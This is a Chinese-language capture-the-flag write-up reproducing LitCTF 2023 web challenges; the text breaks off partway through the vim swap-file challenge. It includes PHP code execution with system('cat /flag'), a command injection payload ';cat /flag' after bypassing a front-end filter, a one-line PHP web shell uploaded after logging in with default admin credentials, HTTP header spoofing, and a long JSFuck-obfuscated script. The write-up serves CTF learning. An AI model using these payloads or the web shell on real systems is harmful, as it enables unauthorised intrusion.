【2023】LitCTF

LitCTF2023(复现)

Web:

1、我Flag呢?

​ ctrl+u 读取源码,在最后发现了flag:

html 复制代码
<!--flag is here flag=NSSCTF{3d5218b9-4e24-4d61-9c15-68f8789e8c48} -->

2、PHP是世界上最好的语言!!

​ 右边那个框下面是 RUN CODE ,结合题目是PHP,推测为RCE,先输入echo 123;看看会发生啥:发现左边输出内容出现了123,那么,直接system("cat /flag");成功拿到flag:flag=NSSCTF{b26d3851-52f5-4a80-9e69-6417baf49d68}

3、导弹迷踪

​ js游戏题,先看源码,这里看game.js:

javascript 复制代码
MG.game = (function () {

    /** Constants **/
    var GameState = {
        WAIT_START: 'wait_start',
        STARTING:   'starting',
        RUNNING:    'running',
        FINISHED:   'finished',
        CRASHED:    'crashed'
    }

    var STARTING_LIVES = 5;

    var LEVEL_NUM_BARRIERS = 20;

    /** Variables **/
    var mState = GameState.WAIT_START;

    var mLives = STARTING_LIVES;
    var mLevel = 0;

    var mRemainingBarriers = 0;
    var mBarriersToPass = 0;

    var mProgress = 0.0;
    var mBestProgress = 0.0;

    /* Strings for UI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    var getLevelString = function () {
        return mLevel ? 'LEVEL ' + mLevel : 'QUALIFYING LEVEL';
    }

    var Messages = {
        START: {
            title: getLevelString,
            text:  function () {return 'CLICK TO BEGIN';}
        },
        CRASH: {
            title: function () {return 'CRASHED';},
            text:  function () {return 'CLICK TO RETRY';}
        },
        GAME_OVER: {
            title: function () {return 'GAME OVER';},
            text:  function () {return 'CLICK TO START AGAIN';}
        },
        FINISH: {
            title: function () {return 'LEVEL COMPLETED';},
            text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},
        }
    };



    var getLevelStartVelocity   = function (level) {
        return 300 + 100*level;
    }

    var getLevelFinishVelocity  = function (level) {
        return 400 + 100*level;
    }

    var getPreLevelIdleVelocity = function (level) {
        return 350 + 100*level;
    }

    var getPostLevelIdleVelocity = function (level) {
        return 550 + 100*level;
    }

    var playCrashAnimation = function () {
        // TODO move drawing out of the update loop

        // create a copy of the explosion element
        var explosion = document.getElementById('explosion');

        // play the animation
        explosion.firstChild.beginElement();
        explosion.setAttribute('visibility', 'visible');

        // TODO can't seem to get a callback to fire when the animation
        // finishes. Use timeout instead
        setTimeout(function (){
            var explosion = document.getElementById('explosion');
            explosion.setAttribute('visibility', 'hidden');
        }, 400);
    }

    var goWaitStartLevel = function () {
        MG.banner.show(Messages.START.title(), Messages.START.text());
        MG.util.showMouse();

        MG.missile.setAutopilot();
        MG.missile.setVelocity(getPreLevelIdleVelocity(mLevel));

        if (mLevel === 0) {mLives = Infinity;}

        mState = GameState.WAIT_START;
    }

    /**
     *
     */
    var goRun = function () {
        MG.banner.hide();
        MG.util.hideMouse();

        /* TODO should the start barrier be pushed here?
        If so, should all of the barriers for the entire level be pushed as well? */
        mRemainingBarriers = LEVEL_NUM_BARRIERS;
        MG.barrierQueue.pushBarrier(MG.BarrierType.START);

        mBarriersToPass = LEVEL_NUM_BARRIERS;

        MG.missile.setManual();

        mState = GameState.STARTING;
    }

    var goFinish = function () {
        MG.banner.show(Messages.FINISH.title(), Messages.FINISH.text());
        MG.util.showMouse();

        MG.missile.setAutopilot();
        MG.missile.setVelocity(getPostLevelIdleVelocity(mLevel));

        mState = GameState.FINISHED;
    }

    var goCrash = function () {
        MG.util.showMouse();

        if (mLives === 0) {
            MG.banner.show(Messages.GAME_OVER.title(), Messages.GAME_OVER.text());
        } else {
            MG.banner.show(Messages.CRASH.title(), Messages.CRASH.text());
        }

        playCrashAnimation()

        mState = GameState.CRASHED;

    }


    //==========================================================================

    return {
        init: function () {
            var rootNode = document.getElementById('tunnel');

            MG.missile.init();

            //

            var wallNode;

            wallNode = document.createElementNS(NAMESPACE_SVG, 'g');
            wallNode.setAttribute('transform', 'scale(1,-1)');

            MG.tunnelWall.init(wallNode);

            rootNode.appendChild(wallNode);

            //

            var barrierQueueNode;

            barrierQueueNode = document.createElementNS(NAMESPACE_SVG, 'g');
            barrierQueueNode.setAttribute('transform', 'scale(1,-1)');

            MG.barrierQueue.init(barrierQueueNode);

            rootNode.appendChild(barrierQueueNode);

            //

            goWaitStartLevel();

            rootNode.setAttribute('visibility', 'visible');
        },


        update: function (dt) {
            MG.missile.update(dt);    
            MG.tunnelWall.update(dt);
            MG.barrierQueue.update(dt);    

            /* check whether the nearest barrier has been reached and whether the missile collides with it. */
            if (!MG.barrierQueue.isEmpty()) {
                if (MG.missile.getOffset() < MG.MISSILE_LENGTH && !MG.missile.isCrashed()){
                    var barrier = MG.barrierQueue.nextBarrier();

                    if (barrier.collides(MG.missile.getPosition().x, MG.missile.getPosition().y)) {
                        // CRASH
                        MG.missile.onCrash();
                        goCrash();
                    } else {

                        // BARRIER PASSED
                        MG.barrierQueue.popBarrier();
                        MG.missile.onBarrierPassed();

                        // TODO this block makes loads of assumptions about state
                        if (mState === GameState.RUNNING
                         || mState === GameState.STARTING) {
                            switch(barrier.getType()) {
                              case MG.BarrierType.FINISH:
                                goFinish();
                                break;
                              case MG.BarrierType.BLANK:
                                break;
                              case MG.BarrierType.START:
                                mState = GameState.RUNNING;
                                // FALLTHROUGH
                              default:
                                mBarriersToPass--;

                                var startVelocity = getLevelStartVelocity(mLevel);
                                var finishVelocity = getLevelFinishVelocity(mLevel);

                                MG.missile.setVelocity(startVelocity
                                                         + (startVelocity - finishVelocity)
                                                           * (mBarriersToPass - LEVEL_NUM_BARRIERS)
                                                             / LEVEL_NUM_BARRIERS);
                                break;
                            }
                        }
                    }
                }    
            }

        
            /* Pad the barrier queue with blank barriers so that there are barriers
            as far as can be seen. */
            while (MG.barrierQueue.numBarriers() < MG.LINE_OF_SIGHT/MG.BARRIER_SPACING) {
                var type = MG.BarrierType.BLANK;
    
                if (mState === GameState.RUNNING
                 || mState === GameState.STARTING) {
                    mRemainingBarriers--;
                    if (mRemainingBarriers > 0) {
                        type = MG.BarrierType.RANDOM;
                    } else if (mRemainingBarriers === 0) {
                        type = MG.BarrierType.FINISH;
                    } else {
                        type = MG.BarrierType.BLANK;
                    }
                }
    
                MG.barrierQueue.pushBarrier(type);
            }

            /* Update progress */
            switch (mState) {
              case GameState.RUNNING:
                mProgress = 1 - (mBarriersToPass*MG.BARRIER_SPACING + MG.missile.getOffset())/(LEVEL_NUM_BARRIERS * MG.BARRIER_SPACING);
                mBestProgress = Math.max(mProgress, mBestProgress);
                break;
              case GameState.FINISHED:
                mProgress = 1;
                mBestProgress = 1;
                break;
              case GameState.STARTING:
                mProgress = 0;
                break;
              default:
                break;
            }

        },

        updateDOM: function () {
            var position = MG.missile.getPosition();
            var offset = MG.missile.getOffset();

            MG.barrierQueue.updateDOM(-position.x, -position.y, offset);
            MG.tunnelWall.updateDOM(-position.x, -position.y, offset);
        },

        onMouseMove: function (x, y) {
            var windowWidth = window.innerWidth;
            var windowHeight = window.innerHeight;

            MG.missile.setTarget(x - 0.5*windowWidth, -(y - 0.5*windowHeight));

        },

        onMouseClick: function () {
            if (MG.banner.isFullyVisible()) {
                switch (mState) {
                  case GameState.WAIT_START:
                    goRun();
                    break;
                  case GameState.FINISHED:
                    /* The player is given an infinite number of lives
                    during the qualifying level but these should be
                    removed before continuing. */
                    if (mLevel === 0) {mLives = STARTING_LIVES;}

                    mLevel++;

                    mBestProgress = 0.0;

                    goWaitStartLevel();
                    break;
                  case GameState.CRASHED:
                    MG.banner.hide();
                    MG.fog.fadeIn(function() {
                            if (mLives === 0) {
                                mLevel = 0;
                                mLives = STARTING_LIVES;
                                mBestProgress = 0.0;
                            } else {
                                mLives--;
                            }


                            MG.missile.reset();
                            MG.barrierQueue.reset();

                            MG.fog.fadeOut();
                            goWaitStartLevel();
                        });
                    break;
                }
            }
        },

        /* Returns an integer representing the current level */
        getLevel: function () {
            return mLevel;
        },

        /* Returns a human readable string describing the current level */
        getLevelString: getLevelString,

        /* Returns the number of times the player can crash before game over. */
        /* If the player crashes with zero lives remaining the game ends */
        getNumLives: function () {
            return mLives;
        },

        /* Returns the progress through the level as a value between 0 and 1,
        where 0 is not yet started and 1 is completed. */
        getProgress: function () {
            return mProgress;       
        },

        getBestProgress: function () {
            return mBestProgress;
        }
    };



}());

​ 然后发现重要代码:

javascript 复制代码
text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},

​ 成功获得flag:{y0u_w1n_th1s_!!!}

4、Follow me and hack me

​ 直接hackbar传参GET:?CTF=Lit2023 POST:Challenge=i'm_c0m1ng

5、Ping:

​ 尝试ping一下127.0.0.1能通,之后尝试 ;ls 发现不行,被限制了,不过,查看网页源代码发现是前端过滤,禁用js之后就能过了,无脑 ;cat /flag拿到flag: flag=NSSCTF{1a6530af-202d-463c-b4ea-c0447db5b801}

6、1zjs:

​ 这个1z真的1点也不Ez (>_<)

​ 第一件事儿查看源码,发现文件./dist/index.umd.js

​ 在这个文件的注释中找到了一个文件:f@k3f1ag.php

​ 之后访问这个文件:

js 复制代码
(+[![]]+[])[+[]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]())[!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+[]]+[]+[+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])

​ 把这个编码过后的东西扔到控制台中,拿到flag:"NSSCTF{0f7f6477-a502-49b1-b7fe-01b2439ab608}"

7、作业管理系统

​ 先看源码,源码最后注释里说了默认的账号和密码都是admin,直接登陆:

​ 之后我不复现了,学校校园网卡我PHP马。

​ 大致说下后续咋做:直接上传php文件,内容是:

php 复制代码
<?php system($_POST['cmd']);?>

​ 上传成功后直接读取该文件,然后post传入一个cat /flag即可。

8、Http pro max plus

​ 这题...难蚌。

​ 先是一堆请求头绕过,直接上:

http 复制代码
User-Agent: Chrome
Client-Ip:127.0.0.1
via:Clash.win
referer: pornhub.com

​ 之后提示访问 /wtfwtfwtfwtf.php文件

​ 访问了之后看源码又要访问/sejishikong.php文件,之后得到flag:

冲完啦?拿上你的flag赶紧走NSSCTF{714b395b-2dfd-4657-8b5b-c82d04fad401}

9、Vim yyds:

​ 访问 /.index.php.swp之后通过vim -r index.php.swp获取源码(vim泄露):

html 复制代码
<html>

<head>
    <meta charset="UTF-8">
    <style type="text/css">
        body,
        html {
            display: flex;
            align-items: center;
            justify-content: center;
        }

        div.vim {
            display: flex;
            align-content: center;
            vertical-align: middle;
